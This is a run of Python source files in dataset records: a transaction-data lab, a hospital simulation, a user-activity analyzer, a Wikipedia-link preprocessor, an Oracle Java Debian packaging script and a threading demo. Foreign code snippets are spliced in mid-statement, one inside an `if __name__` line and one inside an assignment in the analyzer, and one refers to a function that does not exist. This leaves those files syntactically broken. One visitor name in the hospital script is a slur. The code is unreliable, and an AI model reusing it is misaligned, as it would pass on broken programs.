commondate.add((month,date))\n return commondate\n\ndef getNamesBySymbol(n):\n with open('transactions.dat', 'r') as f:\n transactions = f.readlines()\n\n dictionary = {}\n for transaction in transactions:\n transaction = transaction.split(': ')\n companys = transaction[1].split('\\n')\n companys = companys[0].split(', ')\n for company in companys:\n dictionary[company] = set()\n\n for transaction in transactions:\n transaction = transaction.split(': ')\n companys = transaction[1].split('\\n')\n companys = companys[0].split(', ')\n for company in companys:\n if (companys.count(company) >= n):\n dictionary[company].add(transaction[0])\n\n return dictionary\n\n# # ######################################################\nif 
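# Minimal sketch (toy covariance) of the noisy reading drawn in
# generateMeasurement() above: sample around the true velocity with the sensor
# covariance, then reshape to the 3x1 column vector the filter expects.
import numpy
demo_true_v = numpy.array([1.0, 0.0, -0.2])
demo_cov = numpy.diag([0.05, 0.01, 0.01])  # forward axis noisier, as advised
demo_meas = numpy.random.multivariate_normal(demo_true_v, demo_cov).reshape([3, 1])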
__name__ == \"__main__\":\n #problem 1\n #pp(getMonthlyVolume())\n\n #problem 2\n #setvalue = getCommonDays(\"2018\",\"2017\")\n #pp(setvalue)\n #print(len(setvalue))\n\n #bonus\n #pp(getNamesBySymbol(1))\n pass","sub_path":"ECE364SoftwareEngineeringToolsLab/Lab03/Lab03Module.py","file_name":"Lab03Module.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"388430708","text":"import hospital\r\n# A small mistake happened and I did 5.1.22 instead of 5.1.23; it would be really great if I don't have to redo it\r\n\r\n\r\ndef main():\r\n hos = hospital.Hospital(0)\r\n recruits = [[11], [10], [1, \"It's me\"], [12], [20, \"Retard\"], [11]] # Array of visitors\r\n max_time = 1000 # The structure is: (time [,name])\r\n\r\n for t in range(max_time):\r\n for i in recruits:\r\n if i[0] == t:\r\n hos.add_visitor(*i)\r\n\r\n hos.tick_time() # Time ticks and every moment is simulated\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n# Time spent on creation: ~4 hours (I don't know where to write this)\r\n","sub_path":"Lab5/Lab5_1_22.py","file_name":"Lab5_1_22.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"159913675","text":"import json\nimport random\nimport math\n\n\nclass Anomaly:\n barrier_value = 0.19 # empirically derived\n\n def get_abnormal_users(users, days_observed):\n return [user_id for user_id, activity in users.items() if Anomaly.abnormal_activity(activity, days_observed)]\n\n def abnormal_activity(activity, days_observed):\n min_val = min(activity)\n return math.sqrt(sum((x - min_val) ** 2 for x in activity)) / \\\n math.sqrt(days_observed**2 * len(activity)) < Anomaly.barrier_value\n\n\nclass Correlation:\n def get_correlation_table(users, days_observed):\n table = {}\n for user1_id, user1_activity in users.items():\n table[user1_id] = {}\n for user2_id, user2_activity in users.items():\n table[user1_id][user2_id] = Correlation.get_correlation(user1_activity, user2_activity, days_observed)\n return table\n\n def get_correlation(data1, data2, days_observed):\n max_val = math.sqrt(sum(max(x, y, days_observed - x, days_observed - y)**2 for x,y in zip(data1, data2)))\n return 1 - math.sqrt(sum((x - y) ** 2 for x,y in zip(data1, data2))) / max_val\n\n def get_best_pair(cor_table):\n b_pair = ()\n b_value = 0\n for user1_id in cor_table.keys():\n for user2_id, cor_value in cor_table[user1_id].items():\n if user1_id != user2_id and cor_value > b_value:\n b_value = cor_value\n b_pair = (user1_id, user2_id)\n return b_pair\n\n def get_pair_value(table, pair):\n return table[pair[0]][pair[1]]\n\n\nclass Meals:\n breakfast_fun = [0.15, 0.3, 0.7, 1.0, 0.6, 0.27, 0.13]\n breakf_to_din = (3, 5)\n dinner_fun = [0.04, 0.2, 0.6, 0.9, 1.0, 0.9, 0.6, 0.2, 0.04]\n dinner_to_sup = (4, 6)\n supper_fun = [0.1, 0.3, 0.8, 1.0, 0.8, 0.6, 0.2]\n\n def get_meal_times(users, days_observed):\n meal_times = {}\n for user_id, user_activity in users.items():\n meal_times[user_id] = Meals.get_meals(user_activity, days_observed)\n return meal_times\n\n def range_h(diff_to, offset):\n return range(offset + diff_to[0] * 60 // 15, offset + diff_to[1] * 60 // 15)\n\n def get_meals(activity_data, days_observed):\n n = len(activity_data)\n activity_data = activity_data + activity_data\n res = ((0, 0), (0, 0), (0, 0))\n res_val = -1\n for bf_st in range(n):\n dinner_range = Meals.range_h(Meals.breakf_to_din, bf_st)\n for dn_st in dinner_range:\n 
supper_range = Meals.range_h(Meals.dinner_to_sup, dn_st)\n for sup_st in supper_range:\n bf_val = Meals.get_fun_val(activity_data[bf_st:], Meals.breakfast_fun, days_observed)\n dn_val = Meals.get_fun_val(activity_data[dn_st:], Meals.dinner_fun, days_observed)\n sup_val = Meals.get_fun_val(activity_data[sup_st:], Meals.supper_fun, days_observed)\n\n fun_val = bf_val + dn_val + sup_val\n if res_val == -1 or fun_val < res_val:\n res_val = fun_val\n bf_bounds = Meals.get_meal_bounds(bf_st, activity_data[bf_st:], Meals.breakfast_fun, days_observed)\n dn_bounds = Meals.get_meal_bounds(dn_st, activity_data[dn_st:], Meals.dinner_fun, days_observed)\n sup_bounds = Meals.get_meal_bounds(sup_st, activity_data[sup_st:], Meals.supper_fun, days_observed)\n res = (bf_bounds, dn_bounds, sup_bounds)\n\n return res\n\n def get_fun_val(data_slice, meal_fun, days_observed):\n return math.sqrt(sum((x / days_observed - y)**2 for x, y in zip(data_slice, meal_fun)))\n\n def get_meal_bounds(st, data_slice, meal_fun, days_observed):\n data_slice = data_slice[:len(meal_fun)]\n l = len(meal_fun) // 2\n r = l\n sum_cur, sum_all = data_slice[l], sum(data_slice)\n while True:\n if sum_cur >= sum_all * 0.6 or (l == 0 and r == len(data_slice) - 1):\n break\n if l > 0 and (r == len(data_slice) - 1 or data_slice[r + 1] < data_slice[l]):\n sum_cur += data_slice[l - 1]\n l -= 1\n else:\n sum_cur += data_slice[r + 1]\n r += 1\n\n return ((l + st) % (24 * 60 // 15), (r + st) % (24 * 60 // 15))\n\n def get_time_segm(meal_t, time_segments):\n return (time_segments[meal_t[0]], time_segments[meal_t[1]])\n\n def get_time_segms(meal_tms, time_segments):\n return (Meals.get_time_segm(meal_tms[0], time_segments), Meals.get_time_segm(meal_tms[1], time_segments), \\\n Meals.get_time_segm(meal_tms[2], time_segments))\n\n\nclass FocusTime:\n focus_fun = [0.35, 0.3, 0.23, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, \\\n 0.3, 0.5, 0.7, 1.0, 0.7, 0.5, 0.3, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.23, 0.3, 0.35]\n\n def get_focus_times(users, days_observed):\n focus_times = {}\n for user_id, user_activity in users.items():\n focus_times[user_id] = FocusTime.get_focus(user_activity, days_observed)\n return focus_times\n\n def get_focus(activity_data, days_observed):\n n = len(activity_data)\n activity_data *= 2\n res = []\n res_val = -1\n for st in range(n):\n cur_val = FocusTime.get_fun_val(activity_data[st:], FocusTime.focus_fun, days_observed)\n if res_val == -1 or cur_val < res_val:\n res_val = cur_val\n res = FocusTime.get_bounds(st, activity_data[st:], FocusTime.focus_fun, days_observed)\n return res\n\n def get_fun_val(data_slice, focus_fun, days_observed):\n return math.sqrt(sum([(x / days_observed - y)**2 for x, y in zip(data_slice, focus_fun)]))\n\n def get_bounds(st, data_slice, focus_fun, days_observed):\n res = []\n i = 0\n while i < len(focus_fun):\n if focus_fun[i] <= 0.3:\n j = i\n while j < len(focus_fun) and focus_fun[j] <= 0.3:\n j += 1\n res.append(((st + i) % 96, (st + j) % 96))\n i = j\n else:\n i += 1\n return res\n\n def get_time_segms(meal_tms, time_segments):\n res = []\n for x in meal_tms:\n res.append((time_segments[x[0]], time_segments[x[1]]))\n return res\n\n\nuser_data = []\nwith open(\"data_reduced.json\", \"r\") as dfile:\n user_data = json.loads(''.join(dfile.readlines()))\n\ntime_segments = list(user_data[0]['activity_data'].keys())\ndays_observed = user_data[0]['days_observed']\nusers = {}\nfor user in user_data:\n users[user['id']] = 
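# Hedged sketch of the circular template matching that Meals and FocusTime
# perform above: doubling the day's samples makes every wrap-around window
# contiguous, and the best start index minimizes the L2 distance to the
# template. (Toy helper; the real code also normalizes by days_observed.)
import math
def demo_best_start(activity, template):
    doubled = activity * 2
    def dist(st):
        return math.sqrt(sum((x - y) ** 2
                             for x, y in zip(doubled[st:st + len(template)], template)))
    return min(range(len(activity)), key=dist)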
list(user['activity_data'].values())\n\nan_users = Anomaly.get_abnormal_users(users, days_observed)\nprint(\"Anomaly users:\", an_users)\n# delete anomaly observations\nfor id in an_users:\n del users[id]\n\ncor_table = Correlation.get_correlation_table(users, days_observed)\nbest_pair = Correlation.get_best_pair(cor_table)\nprint(\"Best team pair:\", best_pair, Correlation.get_pair_value(cor_table, best_pair))\n\nmeal_times = Meals.get_meal_times(users, days_observed)\nfor id in users.keys():\n meal_time = meal_times[id]\n meal_time = Meals.get_time_segms(meal_time, time_segments)\n print(\"Id:\", id, \"Breakfast:\", meal_time[0], \"Dinner:\", meal_time[1], \"Supper:\", meal_time[2])\n\nfocus_times = FocusTime.get_focus_times(users, days_observed)\nfor id in users.keys():\n focus_time = focus_times[id]\n focus_time = FocusTime.get_time_segms(focus_time, time_segments)\n print(\"Id\", id, \"Focus:\", focus_time)\n","sub_path":"modelling/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40177716","text":"import os\nimport sys\nimport re\nsys.path.append(os.path.abspath('../../'))\nfrom utils.wiki import *\n\nif __name__ == \"__main__\":\n folder = '../../../test/cgl/'\n fname = 'iit_cs'\n wiki2id = dict()\n # load nodes\n with open(folder + fname + '.wikis') as f:\n k = 1\n for line in f:\n wiki2id[line.strip()] = k\n k += 1\n # load vocabulary\n wd2id = dict()\n with open(folder + fname + '.vocab') as f:\n for line in f:\n s = line.strip().split('\\t')\n wd2id[s[0]] = int(s[1])\n\n # write X\n with open(folder + fname + '.x', 'w') as f:\n for wiki in wiki2id:\n wikitext = get_wikitext(wiki, update_cache=0, exbody=True)\n matches = re.findall('\\[\\[(.+?)\\]\\]', wikitext)\n tf = dict()\n for match in matches:\n s = match.split('|')\n if len(s) > 2:\n continue\n link = s[0].strip().lower()\n if link in wd2id:\n wid = wd2id[link]\n tf[wid] = tf.get(wid, 0) + 1\n for wid in tf:\n f.write('{} {} {}\\n'.format(wiki2id[wiki], wid, tf[wid]))\n\n # write y\n with open(folder + fname + '.y', 'w') as out:\n with open(folder + fname + '.edges') as f:\n for line in f:\n s = line.strip().split('\\t')\n out.write('{} {}\\n'.format(wiki2id[s[0]], wiki2id[s[1]]))\n","sub_path":"src/cgl/preprocess/dataPreparation.py","file_name":"dataPreparation.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"119639361","text":"#!/usr/bin/env python\nimport email.utils\nimport logging\nimport os\nimport pathlib\nimport subprocess\nimport sys\nimport yaml\n\nmaintainer = os.environ['MAINTAINER']\nmajor = int(os.environ['MAJOR'])\nversion = os.environ['VERSION']\nrevision = int(os.environ['REVISION'])\nchangelog = 'upstream release' if revision == 1 else 'improve packaging'\nwith open(f'jdk{major}/package.yml') as f:\n d = yaml.safe_load(f)\n priority = d['priority']\n jinfo_ignore = frozenset(d.get('jinfo-ignore') or [])\n packages = d['packages']\n del d\n\narch = 'amd64'\npackage_name_prefix = f'oracle-java-{major}'\njvm_name = f'oracle-java-{major}-{arch}'\njvm_prefix = pathlib.Path('usr/lib/jvm')\njvm = jvm_prefix / jvm_name\njinfo_path = pathlib.Path(f'debian/{package_name_prefix}-jre-headless/{jvm_prefix}/.{jvm_name}.jinfo')\ncacerts = 'jre/lib/security/cacerts' if major == 8 else 'lib/security/cacerts'\nsrc = pathlib.Path('debian/tmp')\n\ndef find(cmd):\n text = 
subprocess.check_output(cmd, cwd=src, shell=True, text=True).strip('\\0')\n if not text:\n return []\n return text.split('\\0')\n\ndef prepare():\n global executables\n global empty_directories\n\n ## rename cacerts\n (src/cacerts).rename(src/f'{cacerts}.oracle')\n\n ## find all executables\n executables = set(find(r'find . -type f -perm /111 -printf \"%P\\0\" | sort -z'))\n\n ## find all empty directories\n empty_directories = set(find(r'find . -type d -empty -printf \"%P\\0\" | sort -z'))\n\n ## generate debian/control\n with open('debian/control', 'w') as control:\n control.write(f'''\\\nSource: {package_name_prefix}\nSection: java\nPriority: optional\nMaintainer: {maintainer}\nBuild-Depends: debhelper (>= 9)\n''')\n for package_name in packages:\n with open(f'debian/{package_name}.control') as package_control:\n data = package_control.read().replace('%prefix%', package_name_prefix)\n control.write(f'''\\\n\nPackage: {package_name_prefix}-{package_name}\n{data}''')\n\n ## generate debian/changelog\n pathlib.Path('debian/changelog').write_text(f'''\\\n{package_name_prefix} ({version}-{revision}) unstable; urgency=low\n\n * {changelog}\n\n -- {maintainer} {email.utils.formatdate()}\n''')\n\n ## generate jinfo header\n jinfo_path.parent.mkdir(mode=0o755, parents=True)\n jinfo_path.write_text(f'''\\\nname={package_name_prefix}\npriority={priority}\n\n''')\n\ndef move(src, dst):\n assert not dst.exists(), dst\n dst.parent.mkdir(mode=0o755, parents=True, exist_ok=True)\n src.rename(dst)\n\ndef process(package_name, meta):\n dst = pathlib.Path(f'debian/{package_name_prefix}-{package_name}/{jvm}')\n\n for path in meta.get('files') or []:\n src_path = src/path\n if path.endswith('/'):\n assert src_path.is_dir(), path\n else:\n assert src_path.is_file() or src_path.is_symlink(), path\n move(src_path, dst/path)\n\n purge = set()\n for path in empty_directories:\n if (dst/path).is_dir():\n purge.add(path)\n empty_directories.difference_update(purge)\n\n substvars(package_name=package_name, meta=meta)\n\n if package_name == 'cacerts':\n path = pathlib.Path(f'debian/{package_name_prefix}-cacerts.postinst')\n path.write_text(f'''\\\n#!/bin/sh\nset -e\n\ncase \"$1\" in\n\tconfigure)\n\t\tupdate-ca-certificates\n\t\tupdate-alternatives --install /{jvm}/{cacerts} {package_name_prefix}-cacerts /{jvm}/{cacerts}.system 20\n\t;;\nesac\n''')\n path.chmod(0o755)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-cacerts.prerm')\n path.write_text(f'''\\\n#!/bin/sh\nset -e\n\ncase \"$1\" in\n remove|deconfigure)\n update-alternatives --remove {package_name_prefix}-cacerts /{jvm}/{cacerts}.system\n rm /{jvm}/{cacerts}.system\n ;;\nesac\n''')\n path.chmod(0o755)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-cacerts/etc/ca-certificates/update.d')\n path.mkdir(mode=0o755, parents=True)\n path /= f'{package_name_prefix}-cacerts'\n path.write_text(f'''\\\n#!/bin/sh\nexec trust extract --overwrite --format=java-cacerts --filter=ca-anchors --purpose server-auth /{jvm}/{cacerts}.system\n''')\n path.chmod(0o755)\n else:\n pkg_exe = set()\n for path in executables:\n dst_path = dst/path\n if not dst_path.exists():\n continue\n pkg_exe.add(path)\n name = pathlib.Path(path).name\n\n path = f'man/man1/{name}.1'\n src_path = src/path\n if src_path.exists():\n move(src_path, dst/path)\n pkg_exe -= jinfo_ignore\n executables.difference_update(pkg_exe)\n if pkg_exe:\n jinfo(package_name=package_name, exe=pkg_exe)\n pkg_exe_list = '\\n'.join(pkg_exe)\n\n path = 
pathlib.Path(f'debian/{package_name_prefix}-{package_name}.postinst')\n with open(path, 'w') as postinst:\n postinst.write(f'''\\\n#!/bin/sh\nset -e\n\njvm=/{jvm}\npriority={priority}\nexecutables='\n{pkg_exe_list}\n'\n\ncase \"$1\" in\n configure)\n for relpath in ${{executables}}; do\n name=$(basename \"${{relpath}}\")\n path=${{jvm}}/${{relpath}}\n link=/usr/bin/${{name}}\n slave_name=${{name}}.1.gz\n slave_path=${{jvm}}/man/man1/${{slave_name}}\n slave_link=/usr/share/man/man1/${{slave_name}}\n if [ -e \"${{slave_path}}\" ]; then\n update-alternatives --install \"${{link}}\" \"${{name}}\" \"${{path}}\" \"${{priority}}\" --slave \"${{slave_link}}\" \"${{slave_name}}\" \"${{slave_path}}\"\n else\n update-alternatives --install \"${{link}}\" \"${{name}}\" \"${{path}}\" \"${{priority}}\"\n fi\n done\n''')\n if package_name == 'jre-headless':\n postinst.write(f'''\n update-alternatives --install \"${{jvm}}/{cacerts}\" {package_name_prefix}-cacerts \"${{jvm}}/{cacerts}.oracle\" 10\n''')\n postinst.write('''\n ;;\nesac\n''')\n path.chmod(0o755)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-{package_name}.prerm')\n with open(path, 'w') as prerm:\n prerm.write(f'''\\\n#!/bin/sh\nset -e\n\njvm=/{jvm}\nexecutables='\n{pkg_exe_list}\n'\n\ncase \"$1\" in\n remove|deconfigure)\n for relpath in ${{executables}}; do\n name=$(basename \"${{relpath}}\")\n update-alternatives --remove \"${{name}}\" \"${{jvm}}/${{relpath}}\"\n done\n''')\n if package_name == 'jre-headless':\n prerm.write(f'''\\\n update-alternatives --remove {package_name_prefix}-cacerts \"${{jvm}}/{cacerts}.oracle\"\n''')\n prerm.write(f'''\\\n ;;\nesac\n''')\n path.chmod(0o755)\n\njinfo_names = set()\n\ndef jinfo(package_name, exe):\n if package_name.endswith('-headless'):\n abbr = f'{package_name[:-9]}hl'\n if abbr == 'jrehl':\n abbr = 'hl'\n else:\n abbr = package_name\n\n for path in exe:\n name = pathlib.Path(path).name\n if name in jinfo_names:\n logging.warning(f'jinfo: duplicate entry, skipped {path}')\n continue\n jinfo_names.add(name)\n with open(jinfo_path, 'a') as jinfo:\n jinfo.write(f'{abbr} {name} /{jvm}/{path}\\n')\n\ndef substvars(package_name, meta):\n depends = meta.get('depends') or []\n recommends = meta.get('recommends') or []\n suggests = meta.get('suggests') or []\n provides = meta.get('provides') or []\n\n with open(f'debian/{package_name_prefix}-{package_name}.substvars', 'a') as substvars:\n substvars.write(f'''\\\n{package_name}:Depends={', '.join(depends)}\n{package_name}:Recommends={', '.join(recommends)}\n{package_name}:Suggests={', '.join(suggests)}\n{package_name}:Provides={', '.join(provides)}\n'''.replace('%prefix%', package_name_prefix))\n\ndef check_missing():\n file_left = find(r'find . ! 
-type d -printf \"%P\\0\" | sort -z')\n bad = False\n for path in file_left:\n if path.startswith('man/man1/') and path.endswith('.1'):\n # ignore man/ without corresponding bin/, occurred in jdk 11.0.12+8\n logging.warning(f'missing: {path}')\n else:\n logging.error(f'missing: {path}')\n bad = True\n for path in empty_directories:\n logging.error(f'missing: {path}')\n bad = True\n if bad:\n sys.exit(1)\n\ndef main():\n logging.basicConfig(\n stream=sys.stderr,\n level='INFO',\n format='[%(levelname)s] %(message)s',\n )\n prepare()\n logging.info('processing packages...')\n for package_name, meta in packages.items():\n if meta is None:\n meta = {}\n process(package_name=package_name, meta=meta)\n check_missing()\n\nif __name__ == '__main__':\n main()\n","sub_path":"package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":8757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"373707691","text":"\"\"\"\r\n线程--同步\r\n\r\n通知和等待\r\n\r\nwait: 等待,释放当前线程占用的锁\r\nnotify:任选一个等待线程\r\nnotifyall:通知所有等待的线程\r\n\"\"\"\r\n# 需求:\r\n\"\"\"\r\n生产者:生产商品 +1\r\n消费者:消费产品 -1\r\n如果仓库只能最多容纳3个产品,供大于求,当生产者商品数量达到3,生产者就不能再生产了,\r\n阻塞状态\r\n仓库中产品的数量是公共变量\r\n\r\n\"\"\"\r\n# sleep:单纯让线程阻塞,但是不能让当前的线程释放锁\r\n# wait: 让线程阻塞,同时释放锁\r\n\r\n# 当生产者释放锁了,消费者获得了锁,可以消费,现在面临着的问题:\r\n#(1)消费者一直消费,消费商品=0 wait\r\n#(2)生产者隔一段时间来仓库看一下商品是不是<3,如果是就可以生产\r\n#(3)如果消费者只要消费了商品,就通知生产者,可以生产了 notify\r\n\r\n#\r\nimport threading,time\r\nlock=threading.Condition()\r\n\r\n#定义生产者消费者\r\ndef produce(li):\r\n for i in range(4):\r\n try:\r\n lock.acquire()\r\n if len(li)==3:\r\n print(\"仓库已满,生产阻塞\")\r\n # 是的生产者等待,释放锁给消费者\r\n lock.wait()\r\n else:\r\n li.append(\"goods\")\r\n print(\"生产了{}\".format(i))\r\n lock.notify_all()\r\n finally:\r\n lock.release()\r\n\r\n\r\ndef consume(li):\r\n for i in range(4):\r\n try:\r\n lock.acquire()\r\n if len(li)==0:\r\n print(\"仓库已空,消费阻塞\")\r\n lock.wait()\r\n else:\r\n li.pop(0)\r\n print(\"消费了{}\".format(i))\r\n lock.notify_all()\r\n finally:\r\n lock.release()\r\n\r\nif __name__==\"__main__\":\r\n li=[]\r\n t1=threading.Thread(target=produce,args=(li,))\r\n t2=threading.Thread(target=consume,args=(li,))\r\n t1.start()\r\n t2.start()\r\n time.sleep(2)\r\n print(t1.is_alive())\r\n print(t2.is_alive())\r\n\r\n","sub_path":"code/day18/day18-1thread-notify.py","file_name":"day18-1thread-notify.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
link